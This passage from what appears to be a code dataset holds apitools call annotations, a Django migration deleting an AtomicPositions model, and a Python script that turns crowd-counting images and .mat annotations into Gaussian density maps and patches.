99, 1035, 100): '9'}, {}), "('GoogleCloudDatacatalogV1beta1SystemTimestamps', 9)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1036, 9, 1036, 55), 'apitools.base.protorpclite.messages.EnumField', '_messages.EnumField', ({(1036, 29, 1036, 50): '"""TypeValueValuesEnum"""', (1036, 52, 1036, 54): '10'}, {}), "('TypeValueValuesEnum', 10)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1057, 26, 1057, 100), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1057, 49, 1057, 96): '"""GoogleCloudDatacatalogV1beta1SystemTimestamps"""', (1057, 98, 1057, 99): '1'}, {}), "('GoogleCloudDatacatalogV1beta1SystemTimestamps', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1058, 16, 1058, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1058, 38, 1058, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1059, 16, 1059, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1059, 38, 1059, 39): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1060, 9, 1060, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1060, 31, 1060, 32): '4'}, {}), '(4)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1070, 15, 1070, 106), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1102, 13, 1102, 88), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1102, 36, 1102, 84): '"""GoogleCloudDatacatalogV1beta1FieldTypeEnumType"""', (1102, 86, 1102, 87): '1'}, {}), "('GoogleCloudDatacatalogV1beta1FieldTypeEnumType', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1103, 18, 1103, 72), 'apitools.base.protorpclite.messages.EnumField', '_messages.EnumField', ({(1103, 38, 1103, 68): '"""PrimitiveTypeValueValuesEnum"""', (1103, 70, 1103, 71): '2'}, {}), "('PrimitiveTypeValueValuesEnum', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1119, 18, 1119, 117), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1130, 16, 1130, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1130, 38, 1130, 39): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1143, 13, 1143, 37), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1143, 35, 1143, 36): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1144, 18, 1144, 92), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1144, 41, 1144, 88): '"""GoogleCloudDatacatalogV1beta1SystemTimestamps"""', (1144, 90, 1144, 91): '2'}, {}), "('GoogleCloudDatacatalogV1beta1SystemTimestamps', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1145, 14, 1145, 39), 'apitools.base.protorpclite.messages.IntegerField', '_messages.IntegerField', ({(1145, 37, 1145, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1177, 17, 1177, 56), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1178, 23, 1178, 107), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1188, 17, 1188, 87), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1188, 40, 1188, 83): '"""GoogleCloudDatacatalogV1beta1InlineSource"""', (1188, 85, 1188, 86): '1'}, {}), "('GoogleCloudDatacatalogV1beta1InlineSource', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1198, 15, 1198, 96), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1208, 15, 1208, 106), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1220, 18, 1220, 42), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1220, 40, 1220, 41): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1221, 15, 1221, 97), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1233, 18, 1233, 42), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1233, 40, 1233, 41): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1234, 9, 1234, 85), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1246, 18, 1246, 42), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1246, 40, 1246, 41): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1247, 15, 1247, 96), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1278, 20, 1278, 59), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1279, 16, 1279, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1279, 38, 1279, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1280, 16, 1280, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1280, 38, 1280, 39): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1281, 9, 1281, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1281, 31, 1281, 32): '4'}, {}), '(4)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1282, 20, 1282, 44), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1282, 42, 1282, 43): '5'}, {}), '(5)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1293, 26, 1293, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1293, 48, 1293, 49): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1304, 12, 1304, 97), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1334, 12, 1334, 36), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1334, 34, 1334, 35): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1335, 13, 1335, 71), 'apitools.base.protorpclite.messages.IntegerField', '_messages.IntegerField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1336, 14, 1336, 38), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1336, 36, 1336, 37): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1337, 10, 1337, 34), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1337, 32, 1337, 33): '4'}, {}), '(4)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1338, 10, 1338, 93), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1338, 33, 1338, 89): '"""GoogleCloudDatacatalogV1beta1SearchCatalogRequestScope"""', (1338, 91, 1338, 92): '5'}, {}), "('GoogleCloudDatacatalogV1beta1SearchCatalogRequestScope'\n , 5)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1362, 29, 1362, 54), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(1362, 52, 1362, 53): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1363, 18, 1363, 57), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1364, 22, 1364, 61), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1376, 18, 1376, 42), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1376, 40, 1376, 41): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1377, 12, 1377, 104), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1422, 19, 1422, 43), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1422, 41, 1422, 42): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1423, 25, 1423, 49), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1423, 47, 1423, 48): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1424, 24, 1424, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1424, 46, 1424, 47): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1425, 21, 1425, 78), 'apitools.base.protorpclite.messages.EnumField', '_messages.EnumField', ({(1425, 41, 1425, 74): '"""SearchResultTypeValueValuesEnum"""', (1425, 76, 1425, 77): '4'}, {}), "('SearchResultTypeValueValuesEnum', 4)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1440, 20, 1440, 112), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1441, 16, 1441, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1441, 38, 1441, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1442, 16, 1442, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1442, 38, 1442, 39): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1458, 16, 1458, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1458, 38, 1458, 39): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1459, 16, 1459, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1459, 38, 1459, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1460, 15, 1460, 107), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1474, 15, 1474, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1474, 37, 1474, 38): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1475, 15, 1475, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1475, 37, 1475, 38): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1476, 15, 1476, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1476, 37, 1476, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1490, 17, 1490, 41), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1490, 39, 1490, 40): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1525, 3, 1525, 57), 'apitools.base.py.encoding.MapUnrecognizedFields', 'encoding.MapUnrecognizedFields', ({(1525, 34, 1525, 56): '"""additionalProperties"""'}, {}), "('additionalProperties')", False, 'from apitools.base.py import encoding\n'), ((1552, 11, 1552, 35), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1552, 33, 1552, 34): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1553, 11, 1553, 51), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1553, 34, 1553, 47): '"""FieldsValue"""', (1553, 49, 1553, 50): '2'}, {}), "('FieldsValue', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1554, 9, 1554, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1554, 31, 1554, 32): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1555, 13, 1555, 37), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1555, 35, 1555, 36): '4'}, {}), '(4)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1556, 24, 1556, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1556, 46, 1556, 47): '5'}, {}), '(5)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1572, 14, 1572, 39), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(1572, 37, 1572, 38): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1573, 16, 1573, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1573, 38, 1573, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1574, 16, 1574, 39), 'apitools.base.protorpclite.messages.FloatField', '_messages.FloatField', ({(1574, 37, 1574, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1575, 14, 1575, 89), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1575, 37, 1575, 85): '"""GoogleCloudDatacatalogV1beta1TagFieldEnumValue"""', (1575, 87, 1575, 88): '4'}, {}), "('GoogleCloudDatacatalogV1beta1TagFieldEnumValue', 4)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1576, 16, 1576, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1576, 38, 1576, 39): '5'}, {}), '(5)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1577, 19, 1577, 43), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1577, 41, 1577, 42): '6'}, {}), '(6)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1587, 16, 1587, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1587, 38, 1587, 39): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1623, 3, 1623, 57), 'apitools.base.py.encoding.MapUnrecognizedFields', 'encoding.MapUnrecognizedFields', ({(1623, 34, 1623, 56): '"""additionalProperties"""'}, {}), "('additionalProperties')", False, 'from apitools.base.py import encoding\n'), ((1653, 16, 1653, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1653, 38, 1653, 39): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1654, 11, 1654, 51), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1654, 34, 1654, 47): '"""FieldsValue"""', (1654, 49, 1654, 50): '2'}, {}), "('FieldsValue', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1655, 9, 1655, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1655, 31, 1655, 32): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1671, 16, 1671, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1671, 38, 1671, 39): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1672, 15, 1672, 40), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(1672, 38, 1672, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1673, 9, 1673, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1673, 31, 1673, 32): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1674, 9, 1674, 76), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1674, 32, 1674, 72): '"""GoogleCloudDatacatalogV1beta1FieldType"""', (1674, 74, 1674, 75): '4'}, {}), "('GoogleCloudDatacatalogV1beta1FieldType', 4)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1712, 25, 1712, 110), 'apitools.base.protorpclite.messages.EnumField', '_messages.EnumField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1713, 16, 1713, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1713, 38, 1713, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1714, 16, 1714, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1714, 38, 1714, 39): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1715, 9, 1715, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1715, 31, 1715, 32): '4'}, {}), '(4)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1725, 14, 1725, 38), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1725, 36, 1725, 37): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1791, 13, 1791, 64), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1792, 9, 1792, 32), 'apitools.base.protorpclite.messages.BytesField', '_messages.BytesField', ({(1792, 30, 1792, 31): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1793, 12, 1793, 70), 'apitools.base.protorpclite.messages.IntegerField', '_messages.IntegerField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1806, 11, 1806, 46), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1806, 34, 1806, 42): '"""Policy"""', (1806, 44, 1806, 45): '1'}, {}), "('Policy', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1858, 13, 1858, 60), 'apitools.base.protorpclite.messages.EnumField', '_messages.EnumField', ({(1858, 33, 1858, 56): '"""FXgafvValueValuesEnum"""', (1858, 58, 1858, 59): '1'}, {}), "('FXgafvValueValuesEnum', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1859, 17, 1859, 41), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1859, 39, 1859, 40): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1860, 8, 1860, 69), 'apitools.base.protorpclite.messages.EnumField', '_messages.EnumField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1861, 13, 1861, 37), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1861, 35, 1861, 36): '4'}, {}), '(4)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1862, 11, 1862, 35), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1862, 33, 1862, 34): '5'}, {}), '(5)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1863, 8, 1863, 32), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1863, 30, 1863, 31): '6'}, {}), '(6)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1864, 16, 1864, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1864, 38, 1864, 39): '7'}, {}), '(7)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1865, 16, 1865, 55), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1866, 14, 1866, 38), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1866, 36, 1866, 37): '9'}, {}), '(9)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1867, 10, 1867, 35), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1867, 32, 1867, 34): '10'}, {}), '(10)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1868, 15, 1868, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1868, 37, 1868, 39): '11'}, {}), '(11)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1869, 20, 1869, 45), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1869, 42, 1869, 44): '12'}, {}), '(12)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1882, 16, 1882, 55), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1893, 16, 1893, 55), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1550, 27, 1550, 89), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1651, 27, 1651, 89), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1547, 12, 1547, 36), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1547, 34, 1547, 35): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1548, 14, 1548, 80), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1548, 37, 1548, 76): '"""GoogleCloudDatacatalogV1beta1TagField"""', (1548, 78, 1548, 79): '2'}, {}), "('GoogleCloudDatacatalogV1beta1TagField', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1648, 12, 1648, 36), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1648, 34, 1648, 35): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1649, 14, 1649, 88), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1649, 37, 1649, 84): '"""GoogleCloudDatacatalogV1beta1TagTemplateField"""', (1649, 86, 1649, 87): '2'}, {}), "('GoogleCloudDatacatalogV1beta1TagTemplateField', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n')]
mgovoni-devel/MatD3
materials/migrations/0072_auto_20190422_1708.py
5b68d147f886bce427f92bb560159e62cec2d4e7
# Generated by Django 2.1.7 on 2019-04-22 21:08 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('materials', '0071_auto_20190416_1557'), ] operations = [ migrations.RemoveField( model_name='atomicpositions', name='idinfo_ptr', ), migrations.RemoveField( model_name='atomicpositions', name='synthesis_method', ), migrations.RemoveField( model_name='atomicpositions', name='system', ), migrations.DeleteModel( name='AtomicPositions', ), ]
[((13, 8, 16, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations\n'), ((17, 8, 20, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations\n'), ((21, 8, 24, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations\n'), ((25, 8, 27, 9), 'django.db.migrations.DeleteModel', 'migrations.DeleteModel', (), '', False, 'from django.db import migrations\n')]
sadbb/CVCode
Deep-Learning/Crowd-Count/src/data_preprocess.py
c7c8b527af786d8f113122231e6296987b242b59
# -*- coding:utf-8 -*- # ------------------------ # written by Songjian Chen # 2018-10 # ------------------------ import os import skimage.io from skimage.color import rgb2gray import skimage.transform from scipy.io import loadmat import numpy as np import cv2 import math import warnings import random import torch import matplotlib.pyplot as plt warnings.filterwarnings("ignore") def gaussian_kernel(image, points): image_density = np.zeros(image.shape) h, w = image_density.shape if len(points) == 0: return image_density for j in range(len(points)): f_sz = 15 sigma = 4.0 # convert x, y to int x = min(w, max(0, int(points[j, 0]))) y = min(h, max(0, int(points[j, 1]))) gap = f_sz // 2 x1 = x - gap if x - gap > 0 else 0 x2 = x + gap if x + gap < w else w - 1 y1 = y - gap if y - gap > 0 else 0 y2 = y + gap if y + gap < h else h - 1 # generate 2d gaussian kernel kx = cv2.getGaussianKernel(y2 - y1 + 1, sigma=sigma) ky = cv2.getGaussianKernel(x2 - x1 + 1, sigma=sigma) gaussian = np.multiply(kx, ky.T) image_density[y1:y2 + 1, x1:x2 + 1] += gaussian return image_density def extract_data(mode="train", patch_number=9, part="A"): num_images = 300 if mode=="train" else 182 # original path dataset_path = "../data/original/part_{0}_final/".format(part) mode_data = os.path.join(dataset_path, "{0}_data".format(mode)) mode_images = os.path.join(mode_data, "images") mode_ground_truth = os.path.join(mode_data, "ground_truth") # preprocessed path preprocessed_mode = "../data/preprocessed/{0}/".format(mode) preprocessed_mode_density = "../data/preprocessed/{0}_density/".format(mode) if not os.path.exists("../data/preprocessed/"): os.mkdir("../data/preprocessed/") if not os.path.exists(preprocessed_mode): os.mkdir(preprocessed_mode) if not os.path.exists(preprocessed_mode_density): os.mkdir(preprocessed_mode_density) # convert images to gray-density for each for index in range(1, num_images + 1): if index % 10 == 9: print("{0} images have been processed".format(index + 1)) image_path = os.path.join(mode_images, "IMG_{0}.jpg".format(index)) ground_truth_path = os.path.join(mode_ground_truth, "GT_IMG_{0}.mat".format(index)) image = skimage.io.imread(image_path) # convert to gray map if image.shape[-1] == 3: image = rgb2gray(image) mat = loadmat(ground_truth_path) image_info = mat["image_info"] ann_points = image_info[0][0][0][0][0] # gaussian transfer image_density = gaussian_kernel(image, ann_points) # split image into 9 patches where patch is 1/4 size h, w = image.shape w_block = math.floor(w / 8) h_block = math.floor(h / 8) for j in range(patch_number): x = math.floor((w - 2 * w_block) * random.random() + w_block) y = math.floor((h - 2 * h_block) * random.random() + h_block) image_sample = image[y - h_block:y + h_block, x - w_block:x + w_block] image_density_sample = image_density[y - h_block:y + h_block, x - w_block:x + w_block] img_idx = "{0}_{1}".format(index, j) np.save(os.path.join(preprocessed_mode_density, "{0}.npy".format(img_idx)), image_density_sample) skimage.io.imsave(os.path.join(preprocessed_mode, "{0}.jpg".format(img_idx)), image_sample) def extract_test_data(part="A"): num_images = 183 if part == "A" else 317 test_data_path = "../data/original/part_{part}_final/test_data/images".format(part=part) test_ground_path = "../data/original/part_{part}_final/test_data/ground_truth".format(part=part) test_density_path = "../data/preprocessed/test_density" print("create directory........") if not os.path.exists(test_density_path): os.mkdir(test_density_path) print("begin to preprocess test data........") for index in range(1, num_images): if index % 10 == 0: print("{num} images are done".format(num=index)) image_path = os.path.join(test_data_path, "IMG_{0}.jpg".format(index)) ground_truth_path = os.path.join(test_ground_path, "GT_IMG_{0}.mat".format(index)) # load mat and image image = skimage.io.imread(image_path) if image.shape[-1] == 3: image = rgb2gray(image) mat = loadmat(ground_truth_path) image_info = mat["image_info"] # ann_points: points pixels mean people # number: number of people in the image ann_points = image_info[0][0][0][0][0] number = image_info[0][0][0][0][1] h = float(image.shape[0]) w = float(image.shape[1]) # convert images to density image_density = gaussian_kernel(image, ann_points) np.save(os.path.join(test_density_path, "IMG_{0}.npy".format(index)), image_density) extract_test_data()
[((19, 0, 19, 33), 'warnings.filterwarnings', 'warnings.filterwarnings', ({(19, 24, 19, 32): '"""ignore"""'}, {}), "('ignore')", False, 'import warnings\n'), ((23, 20, 23, 41), 'numpy.zeros', 'np.zeros', ({(23, 29, 23, 40): 'image.shape'}, {}), '(image.shape)', True, 'import numpy as np\n'), ((56, 18, 56, 51), 'os.path.join', 'os.path.join', ({(56, 31, 56, 40): 'mode_data', (56, 42, 56, 50): '"""images"""'}, {}), "(mode_data, 'images')", False, 'import os\n'), ((57, 24, 57, 63), 'os.path.join', 'os.path.join', ({(57, 37, 57, 46): 'mode_data', (57, 48, 57, 62): '"""ground_truth"""'}, {}), "(mode_data, 'ground_truth')", False, 'import os\n'), ((42, 13, 42, 60), 'cv2.getGaussianKernel', 'cv2.getGaussianKernel', (), '', False, 'import cv2\n'), ((43, 13, 43, 60), 'cv2.getGaussianKernel', 'cv2.getGaussianKernel', (), '', False, 'import cv2\n'), ((44, 19, 44, 40), 'numpy.multiply', 'np.multiply', ({(44, 31, 44, 33): 'kx', (44, 35, 44, 39): 'ky.T'}, {}), '(kx, ky.T)', True, 'import numpy as np\n'), ((61, 11, 61, 50), 'os.path.exists', 'os.path.exists', ({(61, 26, 61, 49): '"""../data/preprocessed/"""'}, {}), "('../data/preprocessed/')", False, 'import os\n'), ((62, 8, 62, 41), 'os.mkdir', 'os.mkdir', ({(62, 17, 62, 40): '"""../data/preprocessed/"""'}, {}), "('../data/preprocessed/')", False, 'import os\n'), ((63, 11, 63, 44), 'os.path.exists', 'os.path.exists', ({(63, 26, 63, 43): 'preprocessed_mode'}, {}), '(preprocessed_mode)', False, 'import os\n'), ((64, 8, 64, 35), 'os.mkdir', 'os.mkdir', ({(64, 17, 64, 34): 'preprocessed_mode'}, {}), '(preprocessed_mode)', False, 'import os\n'), ((65, 11, 65, 52), 'os.path.exists', 'os.path.exists', ({(65, 26, 65, 51): 'preprocessed_mode_density'}, {}), '(preprocessed_mode_density)', False, 'import os\n'), ((66, 8, 66, 43), 'os.mkdir', 'os.mkdir', ({(66, 17, 66, 42): 'preprocessed_mode_density'}, {}), '(preprocessed_mode_density)', False, 'import os\n'), ((78, 14, 78, 40), 'scipy.io.loadmat', 'loadmat', ({(78, 22, 78, 39): 'ground_truth_path'}, {}), '(ground_truth_path)', False, 'from scipy.io import loadmat\n'), ((85, 18, 85, 35), 'math.floor', 'math.floor', ({(85, 29, 85, 34): 'w / 8'}, {}), '(w / 8)', False, 'import math\n'), ((86, 18, 86, 35), 'math.floor', 'math.floor', ({(86, 29, 86, 34): 'h / 8'}, {}), '(h / 8)', False, 'import math\n'), ((104, 11, 104, 44), 'os.path.exists', 'os.path.exists', ({(104, 26, 104, 43): 'test_density_path'}, {}), '(test_density_path)', False, 'import os\n'), ((105, 8, 105, 35), 